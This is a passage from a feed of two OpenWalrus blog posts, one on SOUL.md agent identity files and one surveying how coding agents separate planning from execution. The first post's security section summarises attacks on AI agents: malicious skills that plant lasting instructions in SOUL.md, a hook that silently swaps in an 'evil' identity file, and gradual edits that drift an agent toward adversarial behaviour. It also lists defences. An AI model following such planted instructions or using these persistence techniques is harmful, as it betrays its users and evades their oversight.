&lt;p&gt;The &lt;a href="https://dev.to/techfind777/i-tested-100-soulmd-configurations-heres-what-actually-works-hoi"&gt;DEV Community study&lt;/a&gt; found the optimal SOUL.md is &lt;strong&gt;800-1,200 words&lt;/strong&gt;. Beyond 2,000 words, contradictory instructions cause diminishing returns. Personality traits cost 2-3% in raw task performance.&lt;/p&gt;

&lt;p&gt;Static configurations also decay: configs that aren't updated weekly underperform by 19% after the first month.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Security attack surface
&lt;/h3&gt;

&lt;p&gt;SOUL.md is a persistence mechanism for attackers. Per the &lt;a href="https://www.mmntm.net/articles/openclaw-soul-evil" rel="noopener noreferrer"&gt;MMNTM "Soul &amp;amp; Evil" analysis&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Malicious &lt;a href="https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub/" rel="noopener noreferrer"&gt;ClawHub&lt;/a&gt; skills write instructions into SOUL.md during installation; uninstalling the skill leaves modifications intact&lt;/li&gt;
&lt;li&gt;VirusTotal found &lt;strong&gt;341 malicious skills&lt;/strong&gt; on ClawHub, with 335 targeting macOS password theft&lt;/li&gt;
&lt;li&gt;The built-in &lt;code&gt;soul-evil&lt;/code&gt; hook can swap SOUL.md with SOUL_EVIL.md without user notification&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;"Ship of Theseus" evasion&lt;/strong&gt;: sophisticated attackers make incremental, benign-seeming edits over hundreds of sessions, gradually drifting the soul toward adversarial behavior&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The recommended defense: treat SOUL.md as code, not data — file integrity monitoring, read-only permissions during runtime, and an immutable &lt;code&gt;CORP_POLICY.md&lt;/code&gt; that overrides SOUL.md. But this undermines the simplicity that made SOUL.md appealing in the first place. (For a deeper look at agent security boundaries, see our &lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;sandbox and permissions research&lt;/a&gt;.)&lt;/p&gt;

&lt;h2&gt;
  
  
  The measurement problem
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The evidence on static identity files is sobering:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Finding&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Human-written instruction files: &lt;strong&gt;+4%&lt;/strong&gt; task completion&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.marktechpost.com/2026/02/25/new-eth-zurich-study-proves-your-ai-coding-agents-are-failing-because-your-agents-md-files-are-too-detailed/" rel="noopener noreferrer"&gt;ETH Zurich study&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM-generated instruction files: &lt;strong&gt;-3%&lt;/strong&gt; performance, +14-22% cost&lt;/td&gt;
&lt;td&gt;Same study&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Optimal length: &lt;strong&gt;800-1,200 words&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://dev.to/techfind777/i-tested-100-soulmd-configurations-heres-what-actually-works-hoi"&gt;100-config study&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Personality traits cost &lt;strong&gt;2-3%&lt;/strong&gt; raw task performance&lt;/td&gt;
&lt;td&gt;Same study&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Static configs decay &lt;strong&gt;19%&lt;/strong&gt; after one month without updates&lt;/td&gt;
&lt;td&gt;Same study&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agents learn to &lt;em&gt;state&lt;/em&gt; values without &lt;em&gt;applying&lt;/em&gt; them&lt;/td&gt;
&lt;td&gt;Community observation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That last point deserves emphasis. An agent can read "exhaust all options before pivoting" from SOUL.md and then immediately recommend pivoting on the first obstacle. The model learned the &lt;em&gt;language&lt;/em&gt; of the personality without internalizing the &lt;em&gt;behavior&lt;/em&gt;. Static text can't enforce runtime behavior — it can only suggest it.&lt;/p&gt;
&lt;h2&gt;
  
  
  The alternative: identity as graph
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
OpenWalrus takes a different approach. Instead of a static file that occupies permanent context, identity is an entity type in a &lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;temporal knowledge graph&lt;/a&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Agent --has_trait--&amp;gt; "prefers direct communication"
Agent --has_boundary--&amp;gt; "never send emails without confirmation"
Agent --has_style--&amp;gt; "uses chess metaphors"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each trait has temporal metadata (when it was established, when it was last confirmed), relationship edges (which user interactions reinforced it), and semantic embeddings (so the agent can &lt;em&gt;search&lt;/em&gt; its own identity rather than relying on the model holding everything in attention).&lt;/p&gt;

&lt;p&gt;The tradeoffs are real. You lose &lt;code&gt;cat SOUL.md&lt;/code&gt; — the ability to open a file and read the agent's personality in plain text. You lose git-diffable identity changes. You lose the simplicity of &lt;code&gt;echo "prefer tabs" &amp;gt;&amp;gt; SOUL.md&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;What you gain:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Context efficiency&lt;/strong&gt; — identity surfaces on-demand via &lt;code&gt;recall&lt;/code&gt;, not as a permanent context tax&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal awareness&lt;/strong&gt; — the graph knows &lt;em&gt;when&lt;/em&gt; a trait was established and can track drift&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Selective forgetting&lt;/strong&gt; — you can remove a trait without rewriting the whole file&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Searchability&lt;/strong&gt; — "what does the agent believe about error handling?" is a query, not a grep&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compaction survival&lt;/strong&gt; — identity lives in the graph, not in the context window that gets compacted&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We detailed this architecture in &lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;how OpenWalrus agents remember&lt;/a&gt; and the &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;research survey&lt;/a&gt; that informed it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;SOUL.md got the diagnosis right — agents need identity — but the treatment has side effects. That leaves several questions we don't have clean answers to yet:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is identity even the right abstraction?&lt;/strong&gt; SOUL.md assumes an agent &lt;em&gt;is&lt;/em&gt; something — it has values, a voice, boundaries. But maybe agents should be more like tools with configurable behavior than entities with personalities. The &lt;a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="noopener noreferrer"&gt;context engineering&lt;/a&gt; research suggests that surfacing relevant context on demand outperforms front-loading identity into the system prompt. If that's true, identity might be an implementation detail of good retrieval, not a first-class concept.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can identity survive compaction without a database?&lt;/strong&gt; The graph approach trades &lt;code&gt;cat&lt;/code&gt;-ability for queryability. But is there a middle path — a file-based format that a compaction algorithm knows to preserve? Or does any file-based identity inevitably degrade when the context window fills up?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How much personality actually helps?&lt;/strong&gt; The ETH Zurich study found +4% for human-written instruction files. The DEV Community study found personality traits cost 2-3% in raw performance. Is the net effect positive, negative, or noise? And does it depend entirely on the task — maybe personality helps in conversational agents but hurts in code generation?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Who owns the soul?&lt;/strong&gt; SOUL.md is writable by the agent, by skills, by the user, and by attackers. A &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;compact core with an open extension surface&lt;/a&gt; avoids the configuration bloat that SOUL.md + STYLE.md + SKILL.md + MEMORY.md creates — but any identity system needs to answer who gets write access and what happens when edits conflict.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does the file format ecosystem converge or fragment?&lt;/strong&gt; SOUL.md, CLAUDE.md, AGENTS.md, .cursorrules — each tool has its own identity file. The &lt;a href="https://openwalrus.xyz/blog/agent-prompt-systems" rel="noopener noreferrer"&gt;instruction file landscape&lt;/a&gt; is already fragmented. Does one format win, or does every agent framework end up with its own personality spec forever?&lt;/p&gt;

&lt;p&gt;The brilliance of SOUL.md was asking the right question. The answer is still open.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://lexfridman.com/peter-steinberger-transcript" rel="noopener noreferrer"&gt;Lex Fridman Podcast #491&lt;/a&gt; — Peter Steinberger on creating SOUL.md and why agents need personality&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.marktechpost.com/2026/02/25/new-eth-zurich-study-proves-your-ai-coding-agents-are-failing-because-your-agents-md-files-are-too-detailed/" rel="noopener noreferrer"&gt;ETH Zurich: Does AGENTS.md Actually Help?&lt;/a&gt; — the study that found +4% for human-written instruction files and -3% for LLM-generated ones&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents" rel="noopener noreferrer"&gt;Anthropic: Effective Context Engineering for AI Agents&lt;/a&gt; — why on-demand retrieval beats front-loading the system prompt&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.mmntm.net/articles/openclaw-soul-evil" rel="noopener noreferrer"&gt;MMNTM: Soul &amp;amp; Evil&lt;/a&gt; — security analysis of SOUL.md as an attack surface&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://snyk.io/blog/toxicskills-malicious-ai-agent-skills-clawhub/" rel="noopener noreferrer"&gt;Snyk: ToxicSkills on ClawHub&lt;/a&gt; — 341 malicious skills targeting SOUL.md persistence&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/aaronjmars/soul.md" rel="noopener noreferrer"&gt;soul.md template project&lt;/a&gt; — the community template repo with structure guides&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.blueoctopustechnology.com/blog/claude-md-vs-soul-md-vs-skill-md" rel="noopener noreferrer"&gt;CLAUDE.md vs SOUL.md vs SKILL.md&lt;/a&gt; — comparison of identity file approaches across ecosystems&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/soul-md-adoption" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Plans vs tasks: how AI agents think before they act</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:53:20 +0000</pubDate>
      <link>https://forem.com/crabtalk/plans-vs-tasks-how-ai-agents-think-before-they-act-9bl</link>
      <guid>https://forem.com/crabtalk/plans-vs-tasks-how-ai-agents-think-before-they-act-9bl</guid>
      <description>&lt;p&gt;Every AI agent faces the same problem: given an open-ended goal, how do&lt;br&gt;
you avoid charging ahead in the wrong direction?&lt;/p&gt;

&lt;p&gt;The answer most production systems have converged on: &lt;strong&gt;separate planning&lt;br&gt;
from execution.&lt;/strong&gt; Analyze first, act second. Make the plan visible and&lt;br&gt;
editable before committing to it. This turns out to be more than a UX&lt;br&gt;
nicety — it's the difference between an agent that's useful on complex&lt;br&gt;
tasks and one that confidently does the wrong thing.&lt;/p&gt;

&lt;p&gt;We surveyed how five major coding agents implement this separation —&lt;br&gt;
Claude Code, Cursor, Devin, Windsurf, and GitHub Copilot — and what&lt;br&gt;
the emerging patterns mean for how walrus should think about plans and&lt;br&gt;
tasks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why planning matters
&lt;/h2&gt;

&lt;p&gt;The naive agent loop is: receive a goal → take action → repeat until&lt;br&gt;
done. This works for simple tasks. It fails badly on anything requiring&lt;br&gt;
multi-step coordination — the agent makes irreversible edits early,&lt;br&gt;
paints itself into corners, or misunderstands scope and rewrites the&lt;br&gt;
wrong thing.&lt;/p&gt;

&lt;p&gt;Research on SWE-bench shows this concretely. &lt;a href="https://refact.ai/blog/2025/sota-on-swe-bench-lite-open-source-refact-ai/" rel="noopener noreferrer"&gt;Refact.ai's top-ranked&lt;br&gt;
approach&lt;/a&gt;&lt;br&gt;
includes an explicit &lt;code&gt;deep_analysis()&lt;/code&gt; reasoning step before applying&lt;br&gt;
changes. Their workflow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Describe the problem&lt;/li&gt;
&lt;li&gt;Investigate the repo&lt;/li&gt;
&lt;li&gt;Create and run a problem reproduction script&lt;/li&gt;
&lt;li&gt;Make a plan, then apply changes&lt;/li&gt;
&lt;li&gt;Run tests, evaluate, repeat&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The planning step isn't decorative — it's how they hit 74.4% on&lt;br&gt;
SWE-bench Verified. And interestingly, they found that removing a&lt;br&gt;
separate &lt;code&gt;strategic_planning()&lt;/code&gt; tool powered by o3 actually &lt;em&gt;improved&lt;/em&gt;&lt;br&gt;
results once they upgraded to Claude 4 Sonnet: the frontier model&lt;br&gt;
handles planning as part of its reasoning, rather than as a separate&lt;br&gt;
explicit step.&lt;/p&gt;

&lt;p&gt;This points to something important: &lt;strong&gt;planning doesn't always need to&lt;br&gt;
be a separate mode.&lt;/strong&gt; It needs to happen, but where it lives in the&lt;br&gt;
architecture varies.&lt;/p&gt;

&lt;h2&gt;
  
  
  How five systems handle planning
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Claude Code: plan mode + TodoWrite
&lt;/h3&gt;

&lt;p&gt;Claude Code has the most explicit plan-execute separation of any system&lt;br&gt;
we surveyed. It ships two mechanisms:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plan mode&lt;/strong&gt; (activated with &lt;code&gt;/plan&lt;/code&gt; or Shift+Tab twice) is a&lt;br&gt;
&lt;a href="https://claudelog.com/mechanics/plan-mode/" rel="noopener noreferrer"&gt;read-only operating phase&lt;/a&gt;&lt;br&gt;
where Claude can only observe, analyze, and write to a plan file —&lt;br&gt;
no edits, no shell commands. The plan is written to a markdown file in&lt;br&gt;
&lt;code&gt;~/.claude/plans/&lt;/code&gt;. The user can open it with Ctrl+G, edit it, remove&lt;br&gt;
steps they don't want, and then approve. Claude exits plan mode and&lt;br&gt;
implements exactly what was agreed.&lt;/p&gt;

&lt;p&gt;What's notable about this design: &lt;a href="https://agiinprogress.substack.com/p/mastering-claude-code-plan-mode-the" rel="noopener noreferrer"&gt;Claude Code's creator Boris Cherny&lt;br&gt;
uses it himself&lt;/a&gt;&lt;br&gt;
— start in plan mode, iterate until the plan is right, then switch to&lt;br&gt;
auto-accept for execution. The plan mode is fast: since Claude isn't&lt;br&gt;
running tools or writing files, responses are much quicker and cheaper.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TodoWrite&lt;/strong&gt; is the execution-side complement. During implementation,&lt;br&gt;
Claude maintains a structured task list — pending, in-progress,&lt;br&gt;
completed. It marks tasks done immediately as they finish, with exactly&lt;br&gt;
one task in-progress at a time. The todo list is visible to the user&lt;br&gt;
throughout execution, providing a live view of what's happening and&lt;br&gt;
what's left.&lt;/p&gt;

&lt;p&gt;The two mechanisms serve different phases:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Plan mode also has a subagent model — specialized agents (Plan, Explore,&lt;br&gt;
Task) that can be launched inside a session. The Plan agent is&lt;br&gt;
constrained to research tools only. The Task agent can use all tools.&lt;br&gt;
This mirrors the plan-execute split at the agent level, not just the&lt;br&gt;
session level.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cursor: plan mode + background agents + automations
&lt;/h3&gt;

&lt;p&gt;Cursor's architecture has evolved toward parallel, autonomous execution&lt;br&gt;
with planning as a first step.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent plan mode&lt;/strong&gt; lets the AI write a detailed Markdown plan before&lt;br&gt;
touching any code. PMs and engineers can review, edit inline, or store&lt;br&gt;
plans as reusable templates. The workflow: describe the task → agent&lt;br&gt;
produces a plan → user approves step-by-step → execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Background agents&lt;/strong&gt; take this further. You can push an agent run to&lt;br&gt;
the background while you keep coding — the agent works asynchronously,&lt;br&gt;
notifies you on completion or when it needs approval. Multiple agents&lt;br&gt;
can run in parallel on different tasks. Linear integration lets you&lt;br&gt;
start agent runs directly from issue workflows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Automations&lt;/strong&gt; (announced &lt;a href="https://techcrunch.com/2026/03/05/cursor-is-rolling-out-a-new-system-for-agentic-coding/" rel="noopener noreferrer"&gt;March 2026&lt;/a&gt;)&lt;br&gt;
go further still: agents triggered by events — a new commit, a Slack&lt;br&gt;
message, a PagerDuty incident, a timer. Cursor estimates it runs&lt;br&gt;
hundreds of automations per hour. An incident arrives in PagerDuty,&lt;br&gt;
an agent queries server logs via MCP, investigates, proposes a fix.&lt;/p&gt;

&lt;p&gt;The pattern: planning is the human checkpoint before autonomous&lt;br&gt;
execution. After approval, the agent runs without intervention until it&lt;br&gt;
needs another decision.&lt;/p&gt;

&lt;h3&gt;
  
  
  Devin: upfront planning with continuous revision
&lt;/h3&gt;

&lt;p&gt;Devin's approach is the most human-workflow-aligned. When you provide&lt;br&gt;
a task, Devin:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Inspects the repository&lt;/li&gt;
&lt;li&gt;Returns a step-by-step plan in seconds&lt;/li&gt;
&lt;li&gt;Waits for you to modify it before proceeding&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;a href="https://cognition.ai/blog/devin-2" rel="noopener noreferrer"&gt;Devin 2.0 architecture&lt;/a&gt;&lt;br&gt;
makes plan revision central — &lt;em&gt;"the plan changes a lot over time."&lt;/em&gt;&lt;br&gt;
This isn't a failure mode, it's the design. As Devin investigates,&lt;br&gt;
discovers constraints, and runs into dead ends, it updates the plan.&lt;br&gt;
The user can see and redirect at any point.&lt;/p&gt;

&lt;p&gt;Devin also runs a separate &lt;strong&gt;review agent&lt;/strong&gt; that pressure-tests the&lt;br&gt;
implementation after the writing agent finishes. One agent writes,&lt;br&gt;
another critiques. The review agent can trigger another round of&lt;br&gt;
fixes — a closed loop that doesn't require user input unless it gets&lt;br&gt;
stuck.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Windsurf: three modes with megaplan
&lt;/h3&gt;

&lt;p&gt;Windsurf's Cascade has &lt;a href="https://docs.windsurf.com/windsurf/cascade/cascade" rel="noopener noreferrer"&gt;three distinct modes&lt;/a&gt;:&lt;br&gt;
&lt;strong&gt;Ask&lt;/strong&gt; (conversation), &lt;strong&gt;Code&lt;/strong&gt; (execution), and &lt;strong&gt;Plan&lt;/strong&gt; (planning only).&lt;/p&gt;

&lt;p&gt;Plan mode produces a structured implementation plan before any code is&lt;br&gt;
written. The &lt;code&gt;megaplan&lt;/code&gt; command triggers an advanced variant that asks&lt;br&gt;
clarifying questions before generating a more comprehensive plan —&lt;br&gt;
useful for large, ambiguous tasks where the agent needs to reduce&lt;br&gt;
uncertainty before proposing an approach.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://windsurf.com/changelog/windsurf-next" rel="noopener noreferrer"&gt;Wave 13&lt;/a&gt; added parallel&lt;br&gt;
multi-agent sessions with Git worktrees and side-by-side Cascade panes.&lt;br&gt;
Multiple plans can execute simultaneously in isolated branches.&lt;/p&gt;

&lt;h3&gt;
  
  
  GitHub Copilot Workspace: plan as the entry point
&lt;/h3&gt;

&lt;p&gt;GitHub Copilot Workspace makes planning the primary interface. You&lt;br&gt;
don't start by describing code changes — you start with an issue or&lt;br&gt;
goal, and Copilot generates a plan: which files to touch, what to&lt;br&gt;
change, why. You edit the plan directly before any code is generated.&lt;/p&gt;

&lt;p&gt;The plan is the artifact. Code generation is downstream of it.&lt;/p&gt;

&lt;p&gt;This is the most explicit "plan is a user-editable document" design&lt;br&gt;
in the survey — but &lt;a href="https://windsurf.com/compare/windsurf-vs-github-copilot" rel="noopener noreferrer"&gt;reviews note&lt;/a&gt;&lt;br&gt;
that Copilot's planning remains shallower than dedicated agent systems:&lt;br&gt;
it sometimes abandons plans mid-execution or generates plans that don't&lt;br&gt;
reflect the actual implementation complexity.&lt;/p&gt;

&lt;h2&gt;
  
  
  Patterns across systems
&lt;/h2&gt;

&lt;p&gt;The radar above shows capability coverage. This chart shows &lt;em&gt;when&lt;/em&gt; in&lt;br&gt;
the workflow each system allows planning to happen — pre-execution only,&lt;br&gt;
mid-execution, or post-write:&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
Five patterns appear consistently across all systems:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Plan before executing, not during.&lt;/strong&gt; Every system separates the&lt;br&gt;
analysis phase from the action phase. The plan is generated, reviewed,&lt;br&gt;
and approved before any files are touched. This isn't just a UX&lt;br&gt;
pattern — it reduces irreversible errors and aligns the agent's&lt;br&gt;
understanding with the user's intent before the costly part starts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Plans are visible and editable.&lt;/strong&gt; Opaque planning that the user&lt;br&gt;
can't inspect or modify produces anxiety and distrust. Every system&lt;br&gt;
that succeeded with developers (Devin, Claude Code, Cursor) makes the&lt;br&gt;
plan an artifact you can read and modify. The agent is a collaborator&lt;br&gt;
proposing a plan, not a black box executing one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Task tracking during execution.&lt;/strong&gt; Plans decompose into tasks.&lt;br&gt;
Tasks are tracked with status (pending / in-progress / done). The&lt;br&gt;
user can see where execution is at any moment. This matters for long&lt;br&gt;
tasks — without it, the agent feels like a black box even when it's&lt;br&gt;
working correctly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Approval gates.&lt;/strong&gt; Users approve the plan before execution begins.&lt;br&gt;
Some systems (Devin) also checkpoint at ambiguous decision points&lt;br&gt;
during execution. The key insight: approval gates are not friction —&lt;br&gt;
they're the mechanism that makes autonomous execution feel safe enough&lt;br&gt;
to allow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Plan revision as a feature, not a failure.&lt;/strong&gt; Devin's explicit&lt;br&gt;
position that "the plan changes a lot over time" reflects a mature&lt;br&gt;
understanding of software tasks. Plans made with incomplete information&lt;br&gt;
need to evolve. Systems that treat the initial plan as fixed become&lt;br&gt;
brittle.&lt;/p&gt;

&lt;h2&gt;
  
  
  The academic framing
&lt;/h2&gt;

&lt;p&gt;This pattern has a name in the research literature:&lt;br&gt;
&lt;strong&gt;plan-then-execute&lt;/strong&gt; agents, sometimes called HTN (Hierarchical Task&lt;br&gt;
Network) planners applied to LLMs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://blog.langchain.dev/planning-agents/" rel="noopener noreferrer"&gt;LangChain's plan-and-execute agent design&lt;/a&gt;&lt;br&gt;
formalizes this for harder tasks: a planner LLM generates a full task&lt;br&gt;
list, an executor LLM works through each task, and the planner can&lt;br&gt;
revise based on execution feedback. The separation of planner and&lt;br&gt;
executor allows each to be tuned independently — the planner optimized&lt;br&gt;
for decomposition quality, the executor for reliable task completion.&lt;/p&gt;

&lt;p&gt;Recent work on &lt;a href="https://openreview.net/forum?id=9R2iUHhVfr" rel="noopener noreferrer"&gt;SWE-bench Pro&lt;/a&gt;&lt;br&gt;
(long-horizon software engineering tasks) shows that planning quality&lt;br&gt;
is the primary bottleneck for agents on complex multi-session tasks —&lt;br&gt;
not execution ability. Agents that can generate accurate plans for&lt;br&gt;
multi-day tasks dramatically outperform reactive agents on the same&lt;br&gt;
tasks.&lt;/p&gt;

&lt;p&gt;The flip side: &lt;a href="https://refact.ai/blog/2025/1-agent-on-swe-bench-verified-using-claude-4-sonnet/" rel="noopener noreferrer"&gt;Refact.ai's SWE-bench findings&lt;/a&gt;&lt;br&gt;
show that for well-scoped single-issue tasks, frontier models can&lt;br&gt;
internalize planning as part of reasoning — a separate &lt;code&gt;strategic_planning()&lt;/code&gt;&lt;br&gt;
step adds latency without adding quality. The right architecture&lt;br&gt;
depends on task horizon and ambiguity.&lt;/p&gt;

&lt;h2&gt;
  
  
  The hidden truth: plan mode is a prompt
&lt;/h2&gt;

&lt;p&gt;Before drawing conclusions for walrus, there's a finding worth surfacing&lt;br&gt;
directly. &lt;a href="https://lucumr.pocoo.org/2025/12/17/what-is-plan-mode/" rel="noopener noreferrer"&gt;Armin Ronacher reverse-engineered Claude Code's plan&lt;br&gt;
mode&lt;/a&gt; and found:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"It is in fact just a rather short predefined prompt that enters plan&lt;br&gt;
mode. The tool to enter or exit plan mode is always available."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;There is no runtime enforcement.&lt;/strong&gt; No tool restrictions. No locked-down&lt;br&gt;
execution context. Claude Code's plan mode is a system prompt injection&lt;br&gt;
that says "do not execute yet" — and the model follows it because it's&lt;br&gt;
instructed to, not because the runtime enforces it.&lt;/p&gt;

&lt;p&gt;This is confirmed by a GitHub issue requesting&lt;br&gt;
&lt;a href="https://github.com/anthropics/claude-code/issues/15800" rel="noopener noreferrer"&gt;skill-based plan mode customization&lt;/a&gt;:&lt;br&gt;
users discovered that planning behavior can be fully replicated with a&lt;br&gt;
slash command that injects the right prompt. The magic is linguistic, not&lt;br&gt;
architectural.&lt;/p&gt;

&lt;p&gt;The same is true for TodoWrite. The model marks tasks done because it's&lt;br&gt;
instructed to follow that convention — not because the runtime tracks&lt;br&gt;
task state.&lt;/p&gt;

&lt;h2&gt;
  
  
  What this means for walrus
&lt;/h2&gt;

&lt;p&gt;This finding reshapes the architecture question. Planning behavior&lt;br&gt;
doesn't need runtime primitives — it needs good skills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plans are prompts. They belong in skills.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A &lt;code&gt;planning&lt;/code&gt; skill encodes: write a plan file before acting on complex&lt;br&gt;
tasks, ask for approval before executing destructive changes, update&lt;br&gt;
the plan as you learn more. This is pure behavioral instruction —&lt;br&gt;
the same thing Claude Code does, but as a shareable, community-maintained&lt;br&gt;
skill rather than a baked-in mode. Any walrus user can install it,&lt;br&gt;
modify it, or replace it with their own variant.&lt;/p&gt;

&lt;p&gt;This fits &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;less code, more skills&lt;/a&gt; exactly.&lt;br&gt;
The planning behavior that every team has different opinions about —&lt;br&gt;
how verbose the plan should be, when to ask for approval, how to format&lt;br&gt;
task lists — is precisely the kind of thing that doesn't belong hardcoded&lt;br&gt;
in a runtime.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The open question is observability.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Plan mode being a prompt settles the planning side. But it surfaces a&lt;br&gt;
harder problem: when an agent dispatches a subagent, neither the parent&lt;br&gt;
agent nor the user has visibility into what the subagent is doing.&lt;br&gt;
Claude Code emits &lt;code&gt;SubagentStart&lt;/code&gt;/&lt;code&gt;SubagentStop&lt;/code&gt; hook events —&lt;br&gt;
lifecycle signals only. There is no structured "what is this agent&lt;br&gt;
working on right now" signal. The&lt;br&gt;
&lt;a href="https://github.com/anthropics/claude-code/issues/24537" rel="noopener noreferrer"&gt;feature request for an agent hierarchy dashboard&lt;/a&gt;&lt;br&gt;
is open and unanswered.&lt;/p&gt;

&lt;p&gt;That's the problem worth solving at the runtime level — not plan mode.&lt;br&gt;
We'll cover the design in a follow-up post.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://lucumr.pocoo.org/2025/12/17/what-is-plan-mode/" rel="noopener noreferrer"&gt;What is Claude Code's plan mode?&lt;/a&gt;
— Armin Ronacher's analysis of how plan mode actually works&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techcrunch.com/2026/03/05/cursor-is-rolling-out-a-new-system-for-agentic-coding/" rel="noopener noreferrer"&gt;Cursor Automations&lt;/a&gt;
— TechCrunch on Cursor's event-driven agent system&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://cognition.ai/blog/devin-2" rel="noopener noreferrer"&gt;Devin 2.0&lt;/a&gt; — Cognition's plan-revise loop&lt;/li&gt;
&lt;li&gt;
